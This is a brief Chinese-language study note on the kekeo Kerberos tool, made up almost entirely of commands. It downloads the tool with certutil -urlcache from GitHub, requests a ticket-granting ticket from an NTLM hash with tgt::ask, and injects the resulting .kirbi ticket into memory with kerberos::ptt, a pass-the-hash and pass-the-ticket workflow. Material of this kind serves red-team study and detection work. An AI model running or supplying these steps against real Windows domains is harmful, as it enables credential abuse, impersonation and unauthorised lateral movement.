【笔记】kekeo学习笔记
前言
kekeo学习笔记
下载依赖
1 | certutil -urlcache -split -f https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20211214/kekeo.zip |
启动kekeo控制台
Windows x32
1 | .\Win32\kekeo.exe |
1 | ___ _ kekeo 2.1 (x86) built on Dec 14 2021 11:52:31 |
Windows x64
1 | .\x64\kekeo.exe |
1 | ___ _ kekeo 2.1 (x64) built on Dec 14 2021 11:51:55 |
启动kekeo控制台后立即执行命令
- 可以在启动kekeo控制台后立即执行多条命令
1 | .\kekeo.exe <cmd_1> <cmd_2> |
退出kekeo控制台
1 | kekeo exit |
生成凭据
1 | kekeo tgt::ask /domain:<domain> /user:<username> /ntlm:<hash> |
- 在当前文件夹下会生成
<file>.kirbi文件
查看内存中的所有凭据(可选)
1 | klist |
清除内存中的所有凭据(可选)
1 | klist purge |
导入凭据
<file>.kirbi:上一步骤生成的凭据文件
1 | kekeo kerberos::ptt <file>.kirbi |